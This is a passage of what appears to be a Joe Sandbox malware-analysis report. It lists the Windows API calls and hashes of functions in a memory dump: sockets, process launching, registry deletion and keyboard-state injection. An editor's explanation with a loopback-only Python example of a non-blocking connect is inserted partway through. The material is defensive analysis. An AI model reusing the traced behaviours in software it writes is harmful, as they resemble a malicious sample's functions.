                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                  • String ID: X
                                                                  • API String ID: 774024439-3081909835
                                                                  • Opcode ID: 37162edcaad6721ca3369f5247f6d3b7ade9a6659655ad435e750474796fced6
                                                                  • Instruction ID: aa871fd8b55a6d908f96000811eff88e10b13fc0ad75e4a30f841661e60a13d6
                                                                  • Opcode Fuzzy Hash: 37162edcaad6721ca3369f5247f6d3b7ade9a6659655ad435e750474796fced6
                                                                  • Instruction Fuzzy Hash: CFC16E316083059FD718EF28C855A6AB7E4FF85310F00492DF999DB2A2DB71ED49CB82
                                                                  APIs
                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00966C00
                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00966C21
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00966C34
                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 00966CEA
                                                                  • inet_ntoa.WSOCK32(?), ref: 00966CA7
                                                                    • Part of subcall function 0094A7E9: _strlen.LIBCMT ref: 0094A7F3
                                                                    • Part of subcall function 0094A7E9: _memmove.LIBCMT ref: 0094A815
                                                                  • _strlen.LIBCMT ref: 00966D44
                                                                  • _memmove.LIBCMT ref: 00966DAD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 3619996494-0
                                                                  • Opcode ID: 020ee0eb98f7b4167c170f0c67f9b402c3c62aa41a0a7ffd504bc97a32a9b235
                                                                  • Instruction ID: 7633b5d2547c19fb2b32b2f539a80ed7ced9352e9c44a6e778fbc3ba73ca7aa7
                                                                  • Opcode Fuzzy Hash: 020ee0eb98f7b4167c170f0c67f9b402c3c62aa41a0a7ffd504bc97a32a9b235
                                                                  • Instruction Fuzzy Hash: 0281BE72208204ABD710EB38DC96F7AB7A8EF84714F14491DFA55DB2D2DA70ED05CB92
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f8e70f964a16d569837a4d7c057d09293a73f75b86dc6a0234125269647d696b
                                                                  • Instruction ID: 608fb3bbb9234eda1fed210996e6ad788607aefb5e22d9497c9e20f8d6c29773
                                                                  • Opcode Fuzzy Hash: f8e70f964a16d569837a4d7c057d09293a73f75b86dc6a0234125269647d696b
                                                                  • Instruction Fuzzy Hash: 5971493190411DEFCF04DFA8CC89ABEBBB9FF85314F148159FA15AA251C734AA51CBA4
                                                                  APIs
                                                                  • IsWindow.USER32(01394E50), ref: 0097B3EB
                                                                  • IsWindowEnabled.USER32(01394E50), ref: 0097B3F7
                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0097B4DB
                                                                  • SendMessageW.USER32(01394E50,000000B0,?,?), ref: 0097B512
                                                                  • IsDlgButtonChecked.USER32(?,?), ref: 0097B54F
                                                                  • GetWindowLongW.USER32(01394E50,000000EC), ref: 0097B571
                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0097B589
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                  • String ID:
                                                                  • API String ID: 4072528602-0
                                                                  • Opcode ID: c29f84482f9681303e172989ee570eb84b0d5cd7ac30ac22690e389ae47695b3
                                                                  • Instruction ID: f7d3631d125256109e50b25db52ca4d773aaf2c38d0888ecc454473c935db7b2
                                                                  • Opcode Fuzzy Hash: c29f84482f9681303e172989ee570eb84b0d5cd7ac30ac22690e389ae47695b3
                                                                  • Instruction Fuzzy Hash: 4D71AD36605204EFDB219F64C8E4FBA7BB9FF49310F148059FA49972B2D732A980DB50
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0096F448
                                                                  • _memset.LIBCMT ref: 0096F511
                                                                  • ShellExecuteExW.SHELL32(?), ref: 0096F556
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                    • Part of subcall function 0090FC86: _wcscpy.LIBCMT ref: 0090FCA9
                                                                  • GetProcessId.KERNEL32(00000000), ref: 0096F5CD
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0096F5FC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                  • String ID: @
                                                                  • API String ID: 3522835683-2766056989
                                                                  • Opcode ID: 091b12ee129088c18e615c79a810001181ab00ade8bd932afdcc7e4111411036
                                                                  • Instruction ID: 88ba2f75ebdf48003c860bb06867918b27375b6e649ea4f74b39b667f52e0e48
                                                                  • Opcode Fuzzy Hash: 091b12ee129088c18e615c79a810001181ab00ade8bd932afdcc7e4111411036
                                                                  • Instruction Fuzzy Hash: D961CF75A00619DFCB04DF68D495AAEBBF5FF48310F108069E85AAB361CB30AD41CF81
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00950F8C
                                                                  • GetKeyboardState.USER32(?), ref: 00950FA1
                                                                  • SetKeyboardState.USER32(?), ref: 00951002
                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00951030
                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 0095104F
                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00951095
                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009510B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: 302858817a194e71e8b9b332852d44e9b1b6331c8d3f119bfc43728c56da8237
                                                                  • Instruction ID: 01560d236e2386b6088c05ac4d6953f5225e7de59341febb242f5e5e22d04539
                                                                  • Opcode Fuzzy Hash: 302858817a194e71e8b9b332852d44e9b1b6331c8d3f119bfc43728c56da8237
                                                                  • Instruction Fuzzy Hash: 865124605087D53DFB36D2358C15BBABEAD5B46306F088589E9D4468C3C2D8DCCCD750
                                                                  APIs
                                                                  • GetParent.USER32(00000000), ref: 00950DA5
                                                                  • GetKeyboardState.USER32(?), ref: 00950DBA
                                                                  • SetKeyboardState.USER32(?), ref: 00950E1B
                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00950E47
                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00950E64
                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00950EA8
                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00950EC9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: be9da201c7333c458679bcfc28a487d7b3300631cca0022d5b0e4ef794a8fabd
                                                                  • Instruction ID: a8e70a653ced1b6d18a6301b65f4f08da6ae187f01863b1ae56ce1f9cab1a541
                                                                  • Opcode Fuzzy Hash: be9da201c7333c458679bcfc28a487d7b3300631cca0022d5b0e4ef794a8fabd
                                                                  • Instruction Fuzzy Hash: 5C5118A05087D57DFB32C3368C56BBA7FAD6B86301F188889F9D8564C2C395AC9CD750
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsncpy$LocalTime
                                                                  • String ID:
                                                                  • API String ID: 2945705084-0
                                                                  • Opcode ID: cf3fbc76bf6495cd54a8080219ec62f03f6af2d55a6299a659d9fcaf2930c6aa
                                                                  • Instruction ID: 221fa9841b50ff9b80a7a223117c5306bef14d82fbe390a27d50aa9b407758a3
                                                                  • Opcode Fuzzy Hash: cf3fbc76bf6495cd54a8080219ec62f03f6af2d55a6299a659d9fcaf2930c6aa
                                                                  • Instruction Fuzzy Hash: 0D41D565D1061876DB11FBB58C46ACFB3BC9F49310F508956F908E3222FB34A295C7E6
                                                                  APIs
                                                                    • Part of subcall function 0095466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00953697,?), ref: 0095468B
                                                                    • Part of subcall function 0095466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00953697,?), ref: 009546A4
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 009536B7
                                                                  • _wcscmp.LIBCMT ref: 009536D3
                                                                  • MoveFileW.KERNEL32(?,?), ref: 009536EB
                                                                  • _wcscat.LIBCMT ref: 00953733
                                                                  • SHFileOperationW.SHELL32(?), ref: 0095379F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                  • String ID: \*.*
                                                                  • API String ID: 1377345388-1173974218
                                                                  • Opcode ID: f0f15418c705771cf2df32cd13b3934a3a9e9ab9b8b2841c0abb0f65a4b1d429
                                                                  • Instruction ID: f0b5b7750d2bf8fb22527b914384df3a25d718731f53629f71efbe733fd08875
                                                                  • Opcode Fuzzy Hash: f0f15418c705771cf2df32cd13b3934a3a9e9ab9b8b2841c0abb0f65a4b1d429
                                                                  • Instruction Fuzzy Hash: 10418F71508344AAC752EF65D442ADF77ECAF89380F00482EF899C3251EA34D68DCB52
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 009772AA
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00977351
                                                                  • IsMenu.USER32(?), ref: 00977369
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009773B1
                                                                  • DrawMenuBar.USER32 ref: 009773C4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                                  • String ID: 0
                                                                  • API String ID: 3866635326-4108050209
                                                                  • Opcode ID: 8e8e94aa30fa6ae8472353f6edfbd6cb1c4ffb793f7e269d98befe6efac23352
                                                                  • Instruction ID: 978ed226c4c740cf21ef25292429ee16e955d52fa023d5a134bb0b2bbe363a1f
                                                                  • Opcode Fuzzy Hash: 8e8e94aa30fa6ae8472353f6edfbd6cb1c4ffb793f7e269d98befe6efac23352
                                                                  • Instruction Fuzzy Hash: 7E412C76A04208EFDB20DF90E984EAABBF8FB04314F148529FD19A7290D730AD50EF50
                                                                  APIs
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00970FD4
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00970FFE
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 009710B5
                                                                    • Part of subcall function 00970FA5: RegCloseKey.ADVAPI32(?), ref: 0097101B
                                                                    • Part of subcall function 00970FA5: FreeLibrary.KERNEL32(?), ref: 0097106D
                                                                    • Part of subcall function 00970FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00971090
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00971058
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                  • String ID:
                                                                  • API String ID: 395352322-0
                                                                  • Opcode ID: 72163e5b4a970c2f84a65c8d7bb35cc2e744eb13f5ad8f810cd361c4c43cc2e3
                                                                  • Instruction ID: dcc74e182f1aec493af670f27e0b2d83763b70de6cfb1f926112e49ad5cae9e8
                                                                  • Opcode Fuzzy Hash: 72163e5b4a970c2f84a65c8d7bb35cc2e744eb13f5ad8f810cd361c4c43cc2e3
                                                                  • Instruction Fuzzy Hash: 2B312DB2911109FFDB25DF94DC99EFFB7BCEF08300F004169E509A2241EB749E859AA0
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009762EC
                                                                  • GetWindowLongW.USER32(01394E50,000000F0), ref: 0097631F
                                                                  • GetWindowLongW.USER32(01394E50,000000F0), ref: 00976354
                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00976386
                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009763B0
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 009763C1
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009763DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 2178440468-0
                                                                  • Opcode ID: 5ad4e1b597b50922fcee5f8c35f5f8494771dd867d4596a438b833fe3126d775
                                                                  • Instruction ID: a769acb562244a42323601f81cfbb4f269f7bbd69f0c72c1246d1c94372a8774
                                                                  • Opcode Fuzzy Hash: 5ad4e1b597b50922fcee5f8c35f5f8494771dd867d4596a438b833fe3126d775
                                                                  • Instruction Fuzzy Hash: EA313632608545DFDB21CF59DC84F543BE5FB4A724F1981A8F5189F2B1CB72A840EB50
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0094DB2E
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0094DB54
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0094DB57
                                                                  • SysAllocString.OLEAUT32(?), ref: 0094DB75
                                                                  • SysFreeString.OLEAUT32(?), ref: 0094DB7E
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 0094DBA3
                                                                  • SysAllocString.OLEAUT32(?), ref: 0094DBB1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: 4b29bb5df09ff031392afcda79d79b9e2770dd115c7a69ef82090a0b0e61ed66
                                                                  • Instruction ID: 2964515fecc39f42560a5e855174646bba4b96591916b8865d9332237eab5bc9
                                                                  • Opcode Fuzzy Hash: 4b29bb5df09ff031392afcda79d79b9e2770dd115c7a69ef82090a0b0e61ed66
                                                                  • Instruction Fuzzy Hash: 7321A13A605219AFDF10DFA9DC88CBB73ACFB49360B018535F918DB2A1D674DC8197A4
                                                                  APIs
                                                                    • Part of subcall function 00967D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00967DB6
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009661C6
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009661D5
                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0096620E
                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00966217
                                                                  • WSAGetLastError.WSOCK32 ref: 00966221
                                                                  • closesocket.WSOCK32(00000000), ref: 0096624A
                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00966263
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 910771015-0
                                                                  • Opcode ID: f6e123a542827e3847401944e057f0da4f29e16161dd8a2dcb6ef542d7e5fd23
                                                                  • Instruction ID: 434e8c789be86d7a02af0de444f131c543ca88daaadc782cecab9283607797f6
                                                                  • Opcode Fuzzy Hash: f6e123a542827e3847401944e057f0da4f29e16161dd8a2dcb6ef542d7e5fd23
                                                                  • Instruction Fuzzy Hash: FE31CF32604108ABDF10AF64CC95FBE7BACEB45760F044029F919E7291CB74AD449BA2
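The call sequence listed above (socket(AF_INET, SOCK_STREAM, IPPROTO_TCP), ioctlsocket with 0x8004667E which is FIONBIO, connect, WSAGetLastError, closesocket, and a second ioctlsocket FIONBIO) is the standard non-blocking TCP connect with a timeout: the socket is switched to non-blocking so that connect returns at once with WSAEWOULDBLOCK, the caller waits for the socket to become writable or gives up, and the socket is put back into blocking mode afterwards. Being able to recognise that shape in a trace matters because it is how an interpreter runtime such as AutoIt implements a connect with a configurable timeout, as opposed to a custom C2 routine. The following is an added Python reconstruction of the pattern using POSIX-style socket calls; it is not code from the sample, from AutoIt or from Joe Sandbox, and the helper names and the loopback listener it uses for demonstration are the editor's own.

```python
"""Non-blocking TCP connect with a timeout, the pattern behind the
socket / ioctlsocket(FIONBIO) / connect / WSAGetLastError / closesocket
sequence in the trace.  Added example (POSIX socket API, not Winsock);
not code from the analysed sample or from the sandbox report."""
import errno
import select
import socket


def connect_with_timeout(host, port, timeout=2.0):
    """Return a connected, blocking socket, or None on refusal/timeout.

    Step for step this mirrors the Winsock sequence:
      ioctlsocket(s, FIONBIO, 1)  -> setblocking(False)
      connect()                   -> connect_ex(), errno instead of exception
      WSAGetLastError()           -> inspect the errno value
      wait for writability        -> select()
      ioctlsocket(s, FIONBIO, 0)  -> setblocking(True)
    Winsock reports WSAEWOULDBLOCK for a pending connect; POSIX reports
    EINPROGRESS, so both are accepted as "still in progress".
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    s.setblocking(False)
    rc = s.connect_ex((host, port))
    if rc not in (0, errno.EINPROGRESS, errno.EWOULDBLOCK):
        s.close()            # immediate failure, e.g. ECONNREFUSED
        return None
    if rc != 0:
        _, writable, _ = select.select([], [s], [], timeout)
        if not writable:
            s.close()        # nothing happened within the timeout
            return None
        # Writability alone does not mean success: a refused connect also
        # wakes select(); the real outcome is in SO_ERROR.
        err = s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
        if err != 0:
            s.close()
            return None
    s.setblocking(True)
    return s


def demo():
    """Exercise both outcomes against loopback; returns (connected, refused).

    A listener on an ephemeral port supplies the success case; closing it
    and reconnecting to the same port supplies the refused case, because a
    port with no listener answers with RST.  Both are constructed here for
    the example, nothing external is contacted.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]

    conn = connect_with_timeout("127.0.0.1", port)
    connected = conn is not None
    if conn is not None:
        conn.close()
    listener.close()

    refused = connect_with_timeout("127.0.0.1", port, timeout=1.0) is None
    return connected, refused


if __name__ == "__main__":
    print(demo())
```

When hunting for the same pattern in other traces, the discriminating detail is the pair of ioctlsocket(FIONBIO) calls bracketing a connect whose error code is inspected rather than ignored; a plain blocking connect never toggles FIONBIO, and a raw-socket C2 implant usually does not bother to restore blocking mode.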
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
